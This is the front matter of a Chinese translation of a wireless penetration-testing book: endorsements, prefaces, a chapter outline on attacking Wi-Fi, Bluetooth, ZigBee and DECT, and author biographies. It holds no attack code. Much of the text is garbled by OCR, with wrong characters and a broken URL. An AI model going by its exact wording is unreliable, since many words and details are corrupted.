对 本 书 的 赞 省 


本 书 全 面 地 审视 无 线 网 络 安全 ， 从 Wi-Fi 到 所 出 现 的 无 线 协 议 ， 但 都 不 涉及 其 他 方面 ， 面 对 当今 组 织 的 问题 ， 这 会 威胁 到 无 


线 频谱 。 
一 一 Mike Kershaw (Kismet 软 件 的 作者 ) 
一 本 评价 当今 无 线 网 络 的 实践 指南 ， 作 者 清晰 的 指导 ， 以 及 经 验 教训 对 于 各 级 安全 专业 人 员 都 是 很 有 用 的 。 
一 一 Brian Soby (salesforce.com 网 站 的 产品 安全 理事 ) 


大 多 数 企 业 在 很 大 程度 上 依赖 防火 墙 瓜 术 来 降低 网 络 风 险 。 这 些 利用 防火 墙 扩 术 所 做 的 绥 解 性 策略 ， 对 无 线 攻 击 是 无 效 的 ， 
因此 无 线 网 络 的 引入 ， 会 极 大 地 降低 防御 攻击 的 有 效 性 ， 也 就 是 说 ,一旦 网 络 之 外 的 人 获得 了 网 络 内 部 的 访问 权限 ， 一 个 企业 整 
体 的 风险 状况 可 能 友 生 急剧 的 变化 。 本 书 针对 这 些 风险 ， 市 领 读者 通过 真实 案例 ， 以 一 种 简单 易 读 的 形式 ， 依 次 学 习 无 线 网 络 安 
全 的 基础 、 攻 击 的 方法 ， 以 及 补救 措施 。 对 于 一 个 行业 来 说 ， 获 得 无 线 安全 得 力 的 武器 从 没 变 得 如 此 重要 ， 那 么 这 本 书 做 的 是 最 


到 位 的 。 
Jason R.Lish (Honeywell 〈 霍 尼 韦 尔 ) 国际 公司 的 理事 ，IT 安 全 员 ) 
作者 将 大 量 复杂 的 技术 信息 提炼 成 完整 的 、 实 用 的 无 线 网 络 安全 测试 和 操作 步骤 。 对 于 无 线 网 络 安全 技术 人 员 或 对 其 感 兴趣 


的 人 来 说 ， 本 书 是 一 个 生动 的 参考 指南 。 


David Doyle (夏威夷 航空 公司 CISMI 1 、CISSPI、 高 级 项 目 经 理 、IT 安 全 合 规 员 ) 


本 书简 单 易 懂 、 引 人 入 胜 。 一 旦 你 开始 阅读 本 书 融 会 爱不释手 ， 如 果 你 放下 本 书 ， 只 会 是 因为 你 已 读 完 了 ， 或 者 因为 你 想 马 
上 按 书 中 的 提示 和 技术 一 试 身手 ， 开 始 着 手 保护 自己 的 无 线 系统 了 。 


-一 一 Thomas d ”treppe de Bouvette (Aircrack-ng 软 件 的 作者 ) 


[1] CISM(Certified Information Secutity Managet) :; 注册 信息 安全 经 理 。 译 者 注 


[2] CISSP(Cettified Information System Security Professional): 国际 注册 信息 安全 专家 。 


译 者 注 


在 工作 或 生活 中 ， 以 802.11 为 主要 协议 的 无 线 网 络 ， 覆 苹 学 围 主要 是 单位 或 家 庭 ， 由 于 使 用 人 员 互 相 熟 悉 ， 使 用 目的 相对 
稳定 ， 因 而 其 安全 问题 并 未 受到 很 大 的 重视 。 但 随 着 无 线 网 与 互联 网 的 连接 ， 其 安全 性 已 经 提升 天 了 较 高 的 水 平 ， 这 意味 着 攻击 
该 无 线 网 络 设 备 以 及 无 线 网 络 上 的 主机 ， 不 需要 到 其 无 线 网 络 的 覆 苹 范围 内 ， 只 需要 与 互联 网 连接 ， 进 而 对 无 线 协议 的 攻击 就 可 
以 达到 网 络 的 任何 一 个 角落 ， 其 危险 程度 大 大 增加 。 同 时 由 于 无 线 传输 的 特性 ， 而 使 得 原 有 的 有 线 网 络 的 边界 定义 友 生 了 变化 ,， 
在 有 线 网 络 中 ， 只 要 避免 黑客 物理 连接 到 交换 机 或 路 由 器 ， 束 可 以 在 很 大 程度 上 避免 其 物理 的 接 入 ;而 在 无 线 网 络 中 ， 黑 客 只 要 
处 于 无 线 接 入 点 的 功率 窗 羡 沁 围 内 ， 残 相当 于 连接 进入 了 网 络 ， 那 些 穿 出 区 域 边界 的 匈 余 信 号 正 是 迎接 黑客 的 线 统 。 


本 书 内 容 共 分 为 三 大 部 分 ， 每 一 部 分 又 根据 内 容 分 成 不 同 的 章节， 第 一 部 分 介绍 802.11 无 线 网 络 技 术 的 入 侵 基础 知识 ， 通 


过 阅读 这 一 部 分 内 容 ， 读 者 可 以 从 一 个 “ 菜 乌 ”级 用 户 ， 甚 至 是 对 无 线 网 络 一 无 所 知 的 “门外汉 ” ， 逐 渐变 成 一 个 对 无 线 网 络 由 
硬件 到 软件 、 由 协议 到 应 用 的 初学 者 。“ 工 欲 善 其 事 ， 必 先 利 其 器 ”， 第 一 部 分 最 大 的 收获 就 是 你 可 以 从 中 找到 后 续 要 使 用 的 各 
种 “入 侵 武 器 ”的 各 项 制作 细 市 。 


第 二 部 分 介绍 攻击 802.11 的 客户 端 。 主 要 讲述 的 是 ， 从 802.11 协 议 本 身 的 安全 性 问题 入 手 ， 并 围绕 这 些 安全 问题 ， 讨 论 并 
切实 地 通过 使 用 各 种 入 侵 无 线 客户 端 工 具 ， 完 成 对 无 线 接 入 点 和 该 网 络 中 主机 的 攻击 。 为 了 满足 不 同 操作 系统 用 户 的 需要 ， 作 者 
还 分 别 使 用 了 Microsoft Windows 和 Mac OS X 两 个 重量 级 的 操作 系统 作为 演示 对 象 。 


第 三 部 分 介绍 的 是 入 侵 其 他 无 绕 网 络 的 扩 术 。 如 同 其 他 各 种 前 治 科技 类 书籍 一 样 ， 技 术 在 发展 ， 不 断 出 现 新 的 技术 。 作 为 无 
线 技术 的 ZigBee、DECT、 蓝 牙 扩 术 ， 虽 然 还 不 能 作为 无 线 技术 的 主流 ， 但 也 有 各 目的 生命 力 和 生存 空间 ， 这 一 部 分 摘 述 了 基于 
这 些 技术 的 侦 测 和 攻击 方式 。 


本 书 内 容 由 浅 入 深 ， 层 层 深入 。 为 了 让 读者 重点 关注 一 些 重 要 的 非 技术 细节 ， 作 者 还 精心 为 某 一 次 攻击 虚拟 了 一 个 实际 的 环 
境 。 在 该 环境 中 ， 以 某 一 位 参与 者 实际 的 “经 历 ” 重 现 了 一 次 攻击 的 实例 ， 这 似乎 让 我 们 意识 到 ， 无 线 网 络 的 安全 是 时 时 处 处 存 
在 于 我 们 的 周围 。 也 许 咖啡 厅 里 ， 坐 在 你 斜 对 面 那 个 悠然 喝 着 咖啡 的 大 胡子 ， 目 前 正在 攻击 一 个 远 在 地 球 另 一 侧 的 无 线 网 络 。 为 
了 让 读者 对 每 种 攻击 方式 有 一 个 直观 的 了 解 ， 本 书 作 者 还 独具匠心 地 将 每 种 技术 或 漏洞 根据 其 流行 性 、 难 易 度 、 影 响 力 、 危 险 级 
四 项 参数 进行 定 级 ， 这 样 不 仅 可 以 使 读者 对 该 技术 有 了 新 的 了 解 ， 还 能 让 网 络 安全 人 员 对 如 何 评 价 这 种 危险 有 了 人 参考。 


综合 来 看 ， 本 书 既 包含 了 当前 常用 网 络 的 各 种 反 术 ， 也 包含 了 前 沿 新 型 的 无 线 拉 术 的 入 侵 。 绝 大 多 数 的 技术 细 证 都 是 以 当前 
主流 的 Windows、Mac OS X 和 Linux 操 作 系统 作为 摘 述 对 象 ， 这 样 既 满足 了 广大 用 户 的 需求 ， 也 可 以 展现 问题 的 普遍 性 。 同 样 
也 展示 了 三 位 作者 深厚 的 安全 基础 知识 、 丰 语 工作 经 验 ， 以 及 扎实 的 技术 能 力 。 


最 初 看 到 本 书 的 英文 版 时 ， 感 党 其 中 很 多 技术 和 方法 耳目 一 新 。 正 如 Aircrack-ng 系 列 软件 的 作者 Thomas d” Otreppe de 
Bouvette 所 说 的 那样 ， 每 读 到 书 中 的 一 个 技术 要 点 ， 我 都 有 马上 找 一 个 系统 试 一 试 的 想法 。 于 是 产生 了 翻译 并 推荐 给 广大 读者 
的 想法 ， 约 冯 全 红 、 沈 诸 两 位 共同 玉成 此 事 。 限 于 译 者 的 水 平和 中 西方 文化 的 深层 差异 ， 我 想 还 是 会 有 不 妥 或 错误 ， 诚 挚 欢迎 大 
家 伞 正 ， 同 时 也 相信 读者 阅读 后 会 大 有 神 益 。 


李 瑞 民 


2011 年 11 月 


序言 


时 光 飞 折 ， 回 想 当 初 我 在 JackHarvey 小 学 念 五 年 级 ， 那 时 我 的 身材 还 比较 矮小 ， 所 以 在 学 校 的 图 书馆 内 我 必须 踏 起 脚尖 
能 够 到 书架 上 摆 放 的 传记 。 我 还 清楚 地 记得 自己 看 过 Ben Franklin、Betsy Ross、Thomas Edison 和 Gandhi 的 传记 。 在 我 所 阅 
读 过 的 所 有 传记 中 ， 最 能 够 吸引 我 的 是 Nikola Tesla 的 生平 故事 。 


那 本 传记 的 封面 上 的 那 位 伟大 友 明 家 让 人 印象 深刻 一 一 这 是 一 张 20 世 纪 Tesla 年 轻 时 的 照片 ， 深 陷 的 双眼 、 次 乱 的 头 避 以 及 
他 身后 的 内 电 。 在 封底 的 图 片 中 ，Tesla 从 他 的 眼珠 内 放射 出 了 内 电 ! 这 深 深 地 震撼 了 我 。 你 又 怎么 忍心 不 去 阅读 一 本 有 天 能 从 
眼睛 里 放射 出 内 电 的 友 明 家 的 书 呢 ? 


当 我 翻 开 书 的 时 候 ，Tesla 的 思想 深入 了 我 的 脑海 中 。 电 流 ! 无 线 ! 功率 ! 放大 器 和 电压 ， 有 线 和 无 线 ， 所 有 的 这 些 经 过 


Tesla 的 天 赋 组 合 造 殊 了 X 光 、 无 线 功率 传输 ， 通 过 它们 我 似乎 看 天 了 未 来 的 战争 : 使 用 电击 武器 的 空中 飞艇 ， 使 用 共振 试验 来 震 
动 建筑 或 者 站 窗 地 球 本 身 等 。 我 被 Tesla 深 深 地 鼓舞 了 ， 他 好 像 是 能 够 操作 电流 的 “琴师 ”， 一 位 现实 生活 中 的 Willy Wonka， 
但 是 他 和 钻研 的 是 电子 和 光子 而 不 是 巧克力 。 


在 我 家 的 简陋 实验 室内 ， 我 开始 目 己 搭建 一 些 简单 的 电路 。 当 然 这 些 并 不 能 够 撼动 地 球 。 这 些 简单 的 电路 只 能 够 上 后 有 党 一 些 
LED、 接 收 AM 无 线 信号 或 者 给 我 的 肛 弟 提供 轻微 的 电击 。 但 是 我 也 能 够 友 送 无 线 信 号 并 且 控 制 一 台 我 从 垃圾 场 中 捡 来 的 步 进 电 
机 。 即 使 在 很 远 的 距离 也 可 以 ! 年 少 的 我 身 处 在 技术 的 天 堂 中 。 


之 后 ， 软 件 安 全 进入 了 我 的 生活 中 。 在 学 校 中 我 最 初学 习 的 是 电子 学 ， 但 是 随后 被 迫 放 弃 了 我 喜欢 的 技术 转向 软件 分 析 ， 寻 
找 其 中 的 安全 缺陷 。 当 时 我 做 出 这 个 决定 纯粹 是 因为 生活 所 担 。 互 联网 在 友 展 ， 但 那 时 它 的 软件 (现在 也 是 ) 却 合 有 缺陷 。 残 业 
市 场 需要 的 是 软件 安全 分 析 员 ， 所 以 我 重新 制 J 了 自己 的 职业 规划 。 但 是 我 经 常 想起 自己 的 初恋 一 一 无 线 和 入 侵 电 子 世界 。 


现在 好 消息 来 了 。 当 我 阅读 本 书 的 时 候 ， 我 感觉 自己 对 无 线 和 电子 的 兴趣 叉 重 新 恢复 了 。 无 线 技术 正在 渗透 到 我 们 生活 的 方 
万 面 面 ， 我 们 现在 正 生活 在 Tesla 所 设想 的 元 满 麽 幻 的 世界 中 。 在 本 书 中 ，Johnny Cache、Joshua Wright、Vincent Liu 编 写 
了 这 本 告诉 我 们 如 何 驰 驴 于 这 块 广阔 领域 的 指南。 他 们 讲解 了 多 种 无 线 协议 、 接 入 后 、 客 己 新 软件 、 支 持 硬件 等 ， 同 时 一 步 一 步 
地 指导 我 们 如 何 使 用 这 些 技术 。 这 本 书 让 我 爱不释手 ， 我 不 仪 了 解 了 这 些 无 线 协议 和 系统 的 实际 工作 原理 ， 而 且 还 学 到 了 实用 的 
技术 来 增强 它们 的 安全 性 。 


Cache、Wright 和 Liu 都 是 当代 的 Nikola Tesla， 他 们 在 实验 宇 中 变幻 着 伟大 的 魔法 ， 并 且 和 我 们 一 起 分 享 了 其 中 的 秘密 。 
这 实在 是 太 酷 了 。 我 建议 读者 在 阅读 本 书 时 创建 一 个 廉价 的 实验 室 ， 这 样 束 能 够 实践 在 本 书 中 所 学 到 的 知识 。 


书 中 的 知识 不 仅 有 趣 ， 而 且 非 常 实用 ! 实际 上 对 于 信息 安全 专家 来 说 ， 这 些 都 是 很 重要 的 信息 ， 无 线 技术 在 我 们 的 企业 、 家 
寿 、 政 府 机 构 等 中 都 得 到 了 广泛 应 用 。 换 言 之 ， 你 需要 知道 这 些 知识 从 而 在 职场 中 保持 竞争 力 。 本 书 详细 介绍 了 底层 扩 术 、 协 议 
和 系统 的 运作 原理 ， 为 安全 专业 人 员 寻 找 和 修复 漏洞 提供 了 参考 。 在 数 年 前 ， 我 不 情愿 地 涉足 软件 安全 行业 ， 但 是 现在 我 又 回 到 
了 儿 时 的 原点 。 无 绪 技术 与 软件 、 硬 件 以 及 网 络 协议 、 计 算 机 织 构 紧密 地 联系 在 了 一 起 。 玩 关 归 玩 关 ， 我 们 最 基本 的 动机 是 出 于 
商业 原因 了 解 无 线 技术 的 深层 内 幕 。 拥 有 书 中 的 这 些 知 识 ， 你 能 够 在 职场 中 获得 一 个 更 好 的 职位 ， 让 你 的 办 公 (家 庭 ) 环境 更 加 
安全 。 


我 必须 承认 阅读 本 书 并 不 能 让 你 从 眼珠 内 上 友 射 内 电 ， 但 是 它 会 让 你 对 无 绪 世 界 有 一 个 非常 全 面 的 认识 ， 使 你 能 够 增强 家 庭 和 
商业 网 络 的 安全 性 。 何 乐 而 不 为 呢 ? 


——Ed Skoudis 
JInGuardians 公 司 共 同 创始 人 


SANS 教 师 


目 从 本 书 第 1 版 出 版 以 来 ， 无 线 通 信和 所 面临 的 技术 和 威胁 也 变 得 更 复杂 和 多 样 化 了 。 无 线 拉 术 的 使 用 率 迅 速 增 长 ， 随 之 而 来 
的 是 这 些 技术 所 市 来 的 危险 。 然 而 ， 这 些 危险 会 因为 无 线 拉 术 的 优点 和 便利 被 人 们 所 和 忽视， 这 点 是 无 线 设备 在 全 球 的 家 庭 、 办 公 
宇 、 企 业 扩展 的 一 个 重要 因素 。 


无 线 安 全 不 仅仅 局 限于 802.11 近 术 。 无 线 扩 术 的 普及 使 人 们 对 其 他 像 ZigBee 和 DECT 这 样 流行 的 无 线 协 议 产生 了 深厚 的 兴 
趣 ， 这 促使 人 们 研究 攻击 方法 以 及 协议 的 漏洞 ， 在 设备 中 实现 这 些 协议 。 随 着 无 线 反 术 的 发 展 ， 无 线 网 络 对 于 那些 企图 盗 取 数据 
或 者 破坏 网 络 功 能 的 攻击 者 来 识 变 得 越 来 越 有 吸引 力 。 虽 然 采 用 传统 的 安全 措施 可 以 缓解 这 些 威胁 ， 但 是 只 有 人 在 了 解 无 线 攻击 界 


面 忆 后， 才能 为 它 制订 合适 的 安全 措施 ， 这 是 一 个 特别 环 手 的 难题 。 


本 书 是 进入 无 线 安全 世界 的 一 本 简单 指南 。 在 第 2 版 中 ， 我 们 重新 编写 了 防御 和 攻击 802.11 网 络 与 客户 端 这 个 核心 部 分 。 本 
书 同样 涉及 诸如 ZigBee 和 DECT 这 样 快速 友 展 的 无 绪 技 术 ， 这 尝 近 术 在 今天 的 无 线 网 络 环境 中 得 到 了 赵 来 越 广泛 的 使 用 。 


我 们 在 此 郑重 承诺 ， 第 2 版 是 作者 花费 了 大 量 时 | 间 的 心血 之 作 。 在 第 一 次 重新 编写 本 书 的 时 候 ， 我 们 认真 回顾 了 所 有 来 自 读 
者 的 反馈 和 评价 ， 找 出 在 哪些 方面 我 们 可 以 为 读者 做 得 更 好 。 我 们 同样 回顾 了 第 1 版 中 包含 的 技术 ， 并 且 还 搜索 了 在 第 1 版 之 后 
出 现 的 有 趣 的 技术 。 


在 第 2 版 中 我 们 有 了 一 位 新 的 共同 作者 ，Joshua Wright。Joshua 是 无 线 安全 界 最 受 人 尊重 的 专家 之 一 ， 我 们 相信 你 马上 能 
从 书 中 友 现 他 的 无 私 页 献 以 及 渊博 的 知识 。 


快速 这 引 


在 本 书 中 ， 我 们 使 用 如 下 的 体例 格式 
会 ”攻击 图 标 


这 个 图 标 表示 特定 的 渗透 测试 技术 和 工具 。 在 图 标的 后 面 是 技巧 或 者 是 攻击 技术 的 名 称 。 在 本 书 中 你 会 看 到 如 下 所 示 的 危险 
分 级 表 。 
流行 性 我 们 预计 这 种 攻击 方式 在 现实 中 会 发 生 的 频率 。 表 示 的 方法 很 侧 单 : 1 表示 最 罕见 ，10 表 
3 未 很 普 遇 
实施 攻击 所 需要 的 技术 寺 级 : 10 表示 使 用 广泛 流传 的 傻瓜 式 工 具 或 者 同等 水 平 的 技术 ，] 
难 易 度 表示 需要 目 己 编写 新 的 次 出 程序 。5 表示 需要 攻击 者 对 目标 系统 或 者 协议 有 一 定 的 了 解 ， 
这 样 才能 使 用 比较 难 笔 担 的 售 令 行 工 具 
影响 力 攻击 实施 后 会 产生 的 注 在 危害 。 同 样 从 1 ~ 10，1 表示 泄露 设备 或 者 网 络 上 一 些 细微 的 信 


妃 ，10 表示 获取 权限 或 者 能 够 重 定 丫 、 咒 探 、 修 改 网 络 流量 
危险 级 通过 之 前 3 个 值 求 平均 得 到 这 个 值 
人 @ 对 策 图 标 
大 部 分 的 攻击 都 有 对 应 的 对 策 图 标 。 对 策 表示 我 们 可 以 采取 的 一 些 应 对 措施 ， 使 用 它们 可 以 缓解 对 应 攻击 所 带 来 的 威胁 。 
注意 提示 “警告 这 些 图 标 用 来 强调 我 们 认为 必要 的 特定 细节 和 建议 。 


本 书 的 结构 


本 书 共 分 成 三 个 部 分 。 第 一 部 分 专门 讨论 802.11 无 绪 网 络 ， 它 在 家 庭 和 企业 中 得 到 广泛 使 用 。 第 二 部 分 同样 涉及 802.11， 
但 是 侧重 于 客户 端 ， 它 正 日 益 成 为 那些 企图 入 侵 无 线 用 户 系统 攻击 者 的 目标 。 第 三 部 分 涉及 新 增 的 无 线 技术 ， 包 括 蓝 牙 、 
ZigBee 和 DECT， 对 于 那些 使 用 这 些 协 议 维护 设备 安全 的 读者 来 说 是 非常 有 帮助 的 。 


第 一 部 分 : 破解 802.11 无 线 技术 


本 书 的 第 一 部 分 从 802.11 无 线 标准 基础 开始 ， 讲 述 建立 你 目 己 的 入 侵 工具 包 所 需要 的 硬件 和 软件 。 之 后 从 理论 上 描述 确 


认 、 枚 举 以 及 攻击 802.11 网 络 的 步 又。 


第 1 章 : 802.11 协 议 的 攻击 介绍 


第 1 草 介绍 了 802.11 协 议 ， 然 后 详细 讲解 了 对 构造 无 线 入 侵 工 具 包 所 需要 了 解 的 各 种 知识 。 该 章 的 内 容 包 括 安 涂 操 作 系 统 的 
命令 ， 如 何 选 择 合适 的 无 线 网 络 卡 和 天 线 等 。 


第 2 草 : 扫 摘 和 及 现 802.11 网 络 


第 2 章 讲 解 Windows、Linux、OS X 平 台 上 流行 的 扫 拉 工具。 我 们 深入 进 解 Vistumbler、Kismet 和 KisMAC。 该 章 同 样 会 对 
目前 可 用 的 802.11 的 定位 和 可 视 化 工具 进行 小 结 ， 并 且 介 绍 如何 配 合 GPs 使 用 这 些 工具 。 


第 3 章 : 攻击 802.11 无 线 网 络 


第 3 章 涉 及 所 有 攻击 WEP 的 经 典 方法 ， 同 样 也 包含 那些 不 常见 的 。 我 们 介绍 破解 WEP 密 钥 的 详细 步骤 ， 将 它们 从 FiOS 路 由 
器 中 分 离 出 来 ， 还 会 涉及 各 种 流量 注入 攻击 。 同 样 会 涉及 Basic DoS 攻 击 。 


第 4 章 : 攻击 WPA 保 护 下 的 802.11 网 络 


第 4 章 涉及 当前 所 有 攻击 WPA 的 实际 攻击 方法 ， 包 括 针对 WPA-PSK 的 字典 攻击 ， 使 用 Asleap 攻 击 LEAP 保 护 的 网 络 ， 离 线 攻 
击 RADIUS 共 享 密 文 。 该 章 也 会 解释 最 近 友 现 的 Beck-Tews TKIP 攻 击 。 


二 部 分 : 攻击 802.11 的 客户 端 


本 书 的 第 二 部 分 从 客户 端 角 度 讲述 802.11 的 安全 ， 讨 论 普 遍 使 用 的 入 侵 无 线 客户 新 的 攻击 方法 类 型 ， 详 细 讲 解 现实 世界 中 
攻击 OS X 和 Windows 平 台 上 客户 端的 方法 。 


第 5 章 : 攻击 802.11 的 无 线 客户 新 


第 5 章 向 读者 介绍 各 种 可 以 用 来 入 侵 无 线 客户 尊 的 攻击 方法 ， 包 括 应 用 层 问题 、 欺 骗 访 问 点 、 客 户 问 直接 注入 、 设 备 驱 动 程 
序 漏洞 、 跨 站 点 请 求 伪造 (Cross-site Request Forgery，XSRF) 注入 攻击 。 


第 6 草 : 专项 解说 : 在 OS X 上 架 桥 过 阶 


第 6 章 向 读者 展示 了 利用 Mac OS X 802.11 客 尸 端 漏洞 的 详细 万 法 ， 随 后 介绍 访问 被 入 侵 的 Mac 的 万 法 ， 从 而 来 利用 周边 的 
无 线 网 络 的 漏洞 。 


第 7 章 : 专项 解 咒 : 在 Windows 上 架 桥 过 隐 


第 7 章 向 读者 展示 如 何 利用 Windows 无 线 客 尸 端的 漏洞 ， 利 用 其 他 无 线 设 备 的 漏洞 来 改变 客 尸 站 的 访问 权限 。 


第 三 部 分 : 破解 其 他 无 线 技术 


本 书 的 第 三 部 分 涉及 其 他 无 线 技术 ， 包 括 ZigBee、DECT， 并 且 深 入 讲解 蓝牙 的 侦 测 和 漏洞 利用 .。 


第 8 草 : 蓝牙 扫 摘 和 侦 测 


第 8 章 介绍 如 何 确 认 目标 蓝牙 设备 ， 包 括 如 何 选 择 合适 的 测试 硬件 和 软件 。 该 章 介绍 了 多 种 发 现 蓝牙 设备 的 方法 。 
第 9 章 : 蓝牙 窃听 

第 9 章 在 第 8 章 的 基础 上 ， 对 窗 听 攻 击 进行 了 详细 的 讲解 。 该 章 的 重点 在 于 实施 鹤 听 攻 击 的 不 同方 法 和 工具 。 
第 10 章 : 蓝牙 攻击 和 漏洞 利用 


第 10 章 继续 讨论 前 面 章节 的 内 容 ， 庄 细 讲 述 了 多 种 不 同 的 攻击 监 牙 设备 和 协议 漏洞 的 方法 。 主 题 包括 PIN 破解 、 身 份 修 改 、 
规 泄 利 用 等 。 


第 11 章 : 入 侵 ZigBee 


第 11 草 首先 介绍 了 ZigBee 协 议 的 历史 和 基础 ， 然 后 讲解 设备 侦 测 和 与 网 络 相 关 的 攻击 (如 窃听 和 重 放 ) ， 还 详细 介绍 了 针 
对 ZigBee 设 备 的 复 改 加 密 和 硬件 攻击 细 蔬 。 


第 12 章 : 入 侵 DECT 


第 12 草 介绍 流行 的 DECT 标 准 的 基础 反 术 和 特 点 ， 它 是 全 球 无 线 通信 的 标准 ， 还 介绍 如 何 实施 窃听 和 修改 DECT 流 量 的 攻击 
方法 。 
附录 A: 无 线 评 信 中 的 学 围 确定 和 信息 收集 


附录 人 A 介绍 如 何 划 定 无 线 通 信 评 估 荡 围 的 要 求 和 标准 ， 识 别 陷 阱 ， 在 多 次 专业 测试 之 后 忌 结 的 实战 经 验 ， 可 有 效 指导 评估 ， 
划 定 沁 围 ， 实 施 成 功 的 测试 。 


配套 网 站 


.作为 对 读者 额外 的 回报 ， 作 者 为 本 书 开发 了 一 个 相应 的 网 站 ， 读 者 可 以 访问 
http:/Mwww.hackingexposedwireless.com。 在 该 网 上 站 上 ， 读 者 可 以 找到 本 书 中 摘 述 的 许多 资源 ， 包 括 源 代码 、 脚 本 、 高 分 辨 
率 的 图 片 、 人 资源 的 链接 等 。 


网 站 上 同样 包括 了 802.11 和 蓝牙 的 补充 资料 ， 以 及 有 关 影 响 折 有 无 线 通 信 系 统 的 射频 低 电 平 的 完整 材料 。 

在 本 书 英文 版 出 版 之 后 ， 我 们 确定 了 一 张 勘误 表 ， 人 在 配套 网 站 上 读者 也 可 以 找到 这 些 更 正 ， 所 以 请 经 党 访问 配套 网 站 以 便 紧 
跟 无 线 入 侵 领 域 的 友 展 。 
致 谈 者 的 最 后 一 段 话 


本 书 进行 了 一 些 更 新 ， 增 加 了 新 的 章节 ， 但 是 我 们 相信 本 书 的 宗旨 没有 区 。 我 们 坚信 为 安全 技术 人 员 提供 了 一 本 实用 的 书 
籍 ， 本 书 重点 天 注 安全 技术 人 员 需 要 的 最 新 攻击 和 防御 方法 、 最 先进 的 工具 和 拉 术 。 我 们 希望 读者 能 喜欢 本 书 ， 把 这 本 书 读 注 ， 
做 好 读书 笔记 ， 然 后 应 用 这 些 知 识 。 


Johnny Cache 


Johnny Cache 于 2006 年 获得 Naval Postgraduate School (美国 海军 研究 生 院 ) 计算 机 科学 专业 硕士 学 位 。 他 的 论文 主攻 
802.11 指 纹 设备 驱动 程序 ， 因 其 在 计算 机 科学 领域 最 具 创 新 性 而 赢得 了 “Gary Kildall” [| 奖 。Johnny 于 1988 年 在 Tandy 128 彩 
色 计算 机 编写 了 他 的 第 一 个 程序 ， 从 那 时 起 ， 他 曾 在 多 个 安全 技术 会 议 上 发 言 ， 包 括 BlackHatI、BlueHatD 以 及 Toorcon 上 四。 
他 还 上 友 表 了 一 系列 与 802.11 安 全 有 天 的 论文 ， 同 时 他 也 是 许多 无 线 工 具 软 件 的 作者 。 他 的 无 线 工 具 软件 中 的 大 部 分 都 包含 在 
Airbase 套 件 中 ， 该 套件 可 以 在 802.11mercenary.net 网 上 找到 。Johnny 目 前 作为 一 个 无 线 工程 师 任 职 于 Harris 公 司 。 


Joshua Wright 


Joshua Wright 是 InGuardians 研 究 和 和 咨询 公司 (该 公司 是 一 家 从 事 信息 安全 研究 和 和 俗 询 的 公司 ) 的 一 名 高 级 安全 分 析 师 ， 
也 是 SANS 研 究 所 的 高 级 讲师 和 作家 。 他 定期 在 信息 安全 和 黑客 会 议 上 演讲 ，Joshua 为 开源 社区 贡献 了 大 量 的 研究 论文 和 黑客 工 
具 软 件 。 通 过 他 的 课程 、 咨 询 活动 和 演示 文稿 ， 每 年 为 数 以 和 干 计 的 组 织 所 进行 的 渗透 测试 、 漏 洞 评估 、 安 全 复杂 性 技术 提供 指 
导 。Joshua 持 有 强生 威尔士 (Johnson&Wales) 大 学 科学 理学 学 士 学 位 ， 主 修 信 息 科 学 专业 。 在 他 的 业余 时 间 ， 他 喜欢 与 他 的 


家 人 一 起 度 过 ， 当 他 教 他 的 孩子 的 时 候 ， 总 是 喜欢 从 零 开始 数 起 一。 


Vincent Liu 是 stach&Liu 安 全 咨询 公司 管理 合伙 人 ， 访 公司 向 “财富 1000 强 ”的 企业 和 全 球 金融 机 构 ， 以 及 美国 和 外 国政 
府 提 供 盯 安全 服务 。 在 成 立 Stach&Liu 的 时 候 ，Vincent 领 导 攻 击 和 渗透 与 逆向 工程 团队 为 位 于 Honeywell 国 际 公司 的 全 球 安 全 


单元 (Global Security unit) 工作 。 在 此 之 前 ， 他 是 安永 会 计 师 事务 所 Le] (Ernst&Young) 先进 安全 中 心 的 一 名 顾问 ， 同 时 也 
是 美国 国家 安全 局 (National Security Agency) 的 一 名 安全 分 析 师 。 他 目前 共同 参与 创作 了 《黑客 大 曝光 : Web 应 用 程序 安 
全 ( 原 书 第 3 版 ) 》[/4。Vincent 拥 有 Pennsylvania (美国 宾夕法尼亚 ) 大 学 科学 与 工程 专业 学 士 学 位 ， 主 修 计算 机 科学 与 工程 
专业 ， 辅 修 心理 学 专业 。 


对 本 书 的 贡献 者 


Eric Scott 是 国际 注册 信息 系统 安全 专家 (CISSP) ，Stach&Liu 安 全 咨询 公司 的 安全 助理 (该 公司 向 财富 1000 强 的 企业 和 
全 球 金融 机 构 以 及 美国 和 外 国政 府 提 供 IT 安 全 服务 ) 。 


在 加 入 Stach&Liu 安 全 和 咨询 公司 之 前 ，Eric 在 Microsoft 公 司 的 可 信 计 算 项 目 组 担任 一 名 安全 程序 经 理 。 在 此 期 间 ， 他 负责 
管理 和 对 联邦 、 州 和 行业 法 规 中 的 关键 业务 资产 进行 深入 的 风险 评估 。 上 此外， 他 还 负责 对 有 潜在 升值 能 力 的 地 区 周围 ， 提 供 开 发 
整治 计划 和 详细 的 指导 。 


Brad Antoniewiecz 是 Foundstoneb 网 络 的 漏洞 评估 和 渗透 测试 服务 项 目的 领导 者 。 他 是 一 个 集 内 部 、 外 部 、Web 应 用 程 
序 、 设 备 、 无 线 漏 洞 评估 和 渗透 测试 等 多 种 拉 能 于 一 身 的 高 级 安全 顾问 。Antoniewicz 设 计 了 “Foundstone” s Ultimate 
Hacking:Wireless” (Foundstone 的 终极 黑客 : 无 线 ) 课程 ， 教 授 “Ultimate Hacking:Wireless” (终极 黑客 : 无 线 ) 和 传 
统 的 “Ultimate Hacking” (终极 黑客 ) 这 两 门 课程 。Brad 在 许多 大 会 上 做 过 发 言 ， 撰 写 过 各 种 论文 和 日 皮 书 ， 同 时 也 是 本 书 
的 作者 之 一 ， 并 开发 过 许多 Foundstone 公 司 的 内 部 评估 工具 . 


技术 编辑 简介 


Joshua Wright、Johnny Cache 和 Vincent Liu 从 扩 术 上 各 自 互 换 角色 ， 人 彼此 编辑 了 对 方 章节 的 内 容 。 


Christopher Wang， 又 名 Akiba， 参 与 了 FreakLabs Open Source ZigBee 项 目 。 他 目前 正在 实施 一 个 开源 的 ZigBee 协 议 
栈 ， 并 为 那些 定制 自己 的 ZigBee 设 备 和 网 络 的 人 提供 开源 的 硬件 开发 板 。 他 同时 还 参与 将 他 位 于 http://www.freaklabs.org/ 站 
所 上 的 新 闻 传 送 给 下 一 级 新 闻 服 务 器 的 工作 ， 该 新 闻 主 要 是 天 于 博客 和 无 线 传感器 网 络 (Wireless Sensor Network,，WSN) 
的 ， 并 希望 有 朝 一 日 ， 无 线 传感器 网 络 将 变 得 既 有 用 、 双 安全。 在 第 11 草 中 ，Christopher 提 供 了 有 价值 的 反馈 和 更 正 。 


